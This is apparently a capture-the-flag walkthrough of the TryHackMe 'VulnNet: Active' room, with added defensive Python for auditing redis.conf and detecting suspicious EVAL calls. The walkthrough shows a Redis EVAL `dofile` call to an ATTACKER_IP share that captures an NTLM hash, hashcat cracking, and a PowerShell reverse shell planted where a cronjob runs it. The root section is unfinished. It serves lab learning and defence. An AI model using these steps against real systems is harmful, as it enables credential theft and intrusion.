VulnNet: Active

https://tryhackme.com/room/vulnnetactive

User flag

We start with an nmap scan as usual.

Let's connect with rpcclient and see if we can enumerate the users.

No luck. The next step is enumerating SMB.

Nothing. What if we try enum4linux?

Still nothing worthwhile. We can try to get the domain name with crackmapexec though.

crackmapexec smb IP

After that we can connect to redis and see if we find something interesting.

Get the config.

We find a username in the config.

In some Redis versions we can execute the EVAL command. Let's try to get the user flag that way and see if it works.
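The reason this works is that the Redis instance accepts unauthenticated connections from the network and still has Lua scripting (EVAL) and CONFIG reachable. The following audit script is an added example, not part of the write-up or of any Redis tooling: it parses a redis.conf and reports the weak settings side by side with a hardened version. Both config texts are constructed for the example, and the `requirepass` value is a placeholder.

```python
"""Audit a redis.conf for the settings that expose an instance the way the one
in this room is exposed: reachable on a non-loopback interface, no password,
protected mode off, and EVAL/EVALSHA/CONFIG still callable.
Added example; the configuration texts below are constructed."""

# Constructed: roughly the state that lets an anonymous client run CONFIG GET and EVAL.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# no requirepass set
"""

# Constructed: the same instance with the exposure closed.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass CHANGE_ME_long_random_placeholder
rename-command EVAL ""
rename-command EVALSHA ""
rename-command CONFIG ""
"""

LOOPBACK = ("127.0.0.1", "::1", "localhost")


def parse_conf(text):
    """Return {directive: [values...]}; directives may repeat (rename-command)."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        directives.setdefault(key.lower(), []).append(value.strip())
    return directives


def disabled_commands(directives):
    """Commands renamed to the empty string are unreachable to clients."""
    disabled = set()
    for value in directives.get("rename-command", []):
        parts = value.split(None, 1)
        if len(parts) == 2 and parts[1].strip().strip('"\'') == "":
            disabled.add(parts[0].upper())
    return disabled


def audit_redis_conf(text):
    """Return a sorted list of finding codes; an empty list means nothing flagged."""
    d = parse_conf(text)
    findings = set()

    # No 'bind' directive at all means Redis listens on every interface.
    for value in d.get("bind", ["0.0.0.0"]):
        for addr in value.split():
            if addr.lstrip("-") not in LOOPBACK:
                findings.add("bind-exposed")

    # protected-mode defaults to yes; only an explicit 'no' is a finding.
    if d.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.add("protected-mode-off")

    # An absent or empty requirepass leaves the instance unauthenticated.
    if not any(p.strip('"\'') for p in d.get("requirepass", [])):
        findings.add("no-requirepass")

    # Lua scripting and CONFIG should not be reachable by ordinary clients.
    disabled = disabled_commands(d)
    for cmd in ("EVAL", "EVALSHA", "CONFIG"):
        if cmd not in disabled:
            findings.add(f"{cmd.lower()}-enabled")

    return sorted(findings)


if __name__ == "__main__":
    print("weak:    ", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
```

On Redis 6 and later, per-user ACLs (`ACL SETUSER ... -@scripting -@dangerous`) are the preferred way to take EVAL and CONFIG away from application users; `rename-command` still works and is what this checker looks for, so treat a clean result as a baseline rather than a full review.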

Source:

Now we can use responder and see if we're able to get a hash.

sudo responder -I tun0 -rdwv

Let's run the following eval command again:

eval "dofile('//ATTACKER_IP//share')" 0

We captured a hash.
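From the defender's side, the `eval "dofile('//host//share')"` call above is easy to spot if Redis commands are being recorded. The script below is an added example, not from the write-up: it parses lines in the format Redis MONITOR prints (`<timestamp> [<db> <client>] "cmd" "arg" ...`) and flags EVAL from non-loopback clients and any script body that calls `dofile(` or references a `//host//` style path. The log lines are constructed for the example.

```python
"""Flag Redis EVAL usage that matches the access pattern shown in this room.
Added example; the MONITOR-style log lines are constructed."""
import re

# Constructed sample in Redis MONITOR output format.
SAMPLE_LOG = """\
1700000000.100000 [0 127.0.0.1:45000] "config" "get" "dir"
1700000000.200000 [0 10.10.14.5:51234] "eval" "dofile('//10.10.14.5//share')" "0"
1700000000.300000 [0 10.10.14.5:51235] "get" "session:42"
1700000000.400000 [0 127.0.0.1:45001] "eval" "return redis.call('get', KEYS[1])" "1" "k"
"""

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# dofile() or a UNC-like //host//share reference inside the Lua body.
SUSPICIOUS_SCRIPT_RE = re.compile(r"dofile\s*\(|//[^/\s'\"]+//")
LOOPBACK = ("127.0.0.1", "::1", "localhost")


def parse_monitor_line(line):
    """Return (timestamp, client, [args...]) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = ARG_RE.findall(m.group("args"))
    return m.group("ts"), m.group("client"), args


def client_host(client):
    """Strip the port; IPv6 clients appear as [addr]:port."""
    host = client.rsplit(":", 1)[0]
    return host.strip("[]")


def detect_eval_abuse(log_text):
    """Return a list of (timestamp, client, reason) tuples, one per rule hit."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[2]:
            continue
        ts, client, args = parsed
        cmd = args[0].lower()
        if cmd not in ("eval", "evalsha"):
            continue
        if client_host(client) not in LOOPBACK:
            hits.append((ts, client, "remote-eval"))
        if cmd == "eval" and len(args) > 1 and SUSPICIOUS_SCRIPT_RE.search(args[1]):
            hits.append((ts, client, "eval-dofile-or-unc-path"))
    return hits


if __name__ == "__main__":
    for hit in detect_eval_abuse(SAMPLE_LOG):
        print(hit)
```

MONITOR is expensive on a busy instance and is not something to leave running; the same rule logic applies to whatever command audit you do keep (a proxy log, or `ACL LOG` entries after scripting is denied to application users). The remote-eval rule assumes that legitimate scripting only comes from the application host, which you should confirm before alerting on it.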

Let's save the hash and crack it using hashcat.

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt 

Now we can try to enumerate smb again with the user and creds we found.

Let's check what's inside Enterprise-Share.

We can assume there's a cronjob executing the file. We can try to upload a reverse shell with the name "PurgeIrrelevantData_1826.ps1" and see if we're lucky.

We can use the famous Invoke-PowerShellTcp.ps1 shell. Edit the file adding this line to the bottom:

Invoke-PowerShellTcp -Reverse -IPAddress YOUR_IP -Port PORT

Start a listener.

We are in. We can check the user flag again.

Root flag

After a while spent trying to abuse those privileges, we got nothing.

Let's use sharphound to enumerate the machine.

Download the zip and fire up Bloodhound to see if we find something useful.

Coming soon...
